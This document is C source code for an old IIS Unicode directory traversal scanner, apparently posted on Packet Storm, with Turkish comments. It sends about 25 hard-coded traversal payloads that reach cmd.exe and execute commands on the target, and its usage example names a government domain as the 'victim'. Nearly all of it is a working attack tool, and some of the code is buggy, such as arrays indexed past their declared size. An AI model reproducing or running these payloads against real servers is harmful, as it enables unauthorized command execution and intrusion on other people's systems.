This tool can be used to scan IIS servers for the unicode directory traversal vulnerability.
d68555136e1216e01f665bb28f94c34d9fa82ebd4c0629f79f500a373361d1c4/* iss web serverlarýnda Unicode bug'u serverda aratma
*
* Rammstein - admin@xmirc.com - irc.ada.net.tr #root
*
* Rooting Sabotage Forced - www.rooting.cjb.net
*
* Kullaným ./iss www.victim.telekom.gov.tr :)))
*
* gcc de derlemek için ; gcc -o iss iss.c
*
* Bu Programýn kodlarý tamamen bana ait deðildir Gerekli yerlerdeki deðiþikleri
* yapýp en çok bulunan Unicode bug'larý ile fix ledim programa katkýda bulunan
* PcKiLLeR - CiLeK - Cancer-X - Sephiroth ' a tþkler :)
*/
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
void main(int argc, char *argv[])
{
char *bulunan;
char tampon[1024];
char mesaj[] = "200";
int toplam=0;
int sayac;
int buldum=0;
char shoptampon[20];
char *tmp[10];
char *hata[10];
int sock;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long giris;
unsigned long duzelt;
tmp[1]="GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[2]="GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[3]="GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[4]="GET /iisadmpwd/..%c0%af../cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[5]="GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[6]="GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[7]="GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[8]="GET /scripts/..%255c..%255cwindows/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[9]="GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[10]="GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[11]="GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[12]="GET /samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[13]="GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[14]="GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[15]="GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[16]="GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[17]="GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[18]="GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[19]="GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[20]="GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[21]="GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[22]="GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[23]="GET /..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[24]="GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[25]="GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
hata[1] = "/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir ";
hata[2] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir ";
hata[3] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir ";
hata[4] = "/iisadmpwd/..%c0%af../cmd.exe?/c+dir ";
hata[5] = "/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ";
hata[6] = "/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ";
hata[7] = "/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir ";
hata[8] = "/scripts/..%255c..%255cwindows/system32/cmd.exe?/c+dir ";
hata[9] = "/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ";
hata[10] = "/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ";
hata[11] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir ";
hata[12] = "/samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir ";
hata[13] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ ";
hata[14] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[15] = "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[16] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[17] = "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[18] = "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[19] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[20] = "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir ";
hata[21] = "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir ";
hata[22] = "/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[23] = "/..%c0%af../winnt/system32/cmd.exe?/c+dir ";
hata[24] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ ";
hata[25] = "/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\ ";
if (argc<2)
{
system("clear");
printf("\n\t _ ");
printf("\n\t|_ ._ _ _ | o ");
printf("\n\t|_ | (/_ (_| | | ");
printf("\n\t _| ");
printf("\n\nUnicode Scanner (c) 2002 ");
printf("\nKullanImI : %s www.victim.telekom.gov.tr
\n\n",argv[0]);
exit(0);
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
system("clear");
printf("\n\t _ ");
printf("\n\t|_ ._ _ _ | o ");
printf("\n\t|_ | (/_ (_| | | ");
printf("\n\t _| ");
printf("\n\t Unicode Scanner (c) 2002 ");
giris=inet_addr(argv[1]);
duzelt=ntohl(giris);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr,
he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
{
perror("connect");
}
send(sock, "HEAD / HTTP/1.0\n\n",17,0);
recv(sock, tampon, sizeof(tampon),0);
printf("%s",tampon);
close(sock);
system("clear");
printf("Tarama YapILIyor..\n\n");
while(toplam++ < 8)
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr,
he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
{
perror("connect");
}
for(sayac=0;sayac < 20;sayac++)
{
shoptampon[sayac] = '\0';
}
send(sock, tmp[toplam],strlen(tmp[toplam]),0);
recv(sock, shoptampon, sizeof(shoptampon),0);
bulunan = strstr(shoptampon,mesaj);
if( bulunan != NULL)
{
printf("%s : ",hata[toplam]);
printf(" Okey unicode bug Bulundu bu iþ tamam :\)\n");++buldum;
}
close(sock);
}
if (buldum)
{
printf("\n Tarama isLemi %s web Sitesi icin
bitti.\n", argv[1]);
}
else printf ("\n Uzgunum tarama sonucunda Unicode bugu
bulunamamIstIr...\n\n");
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed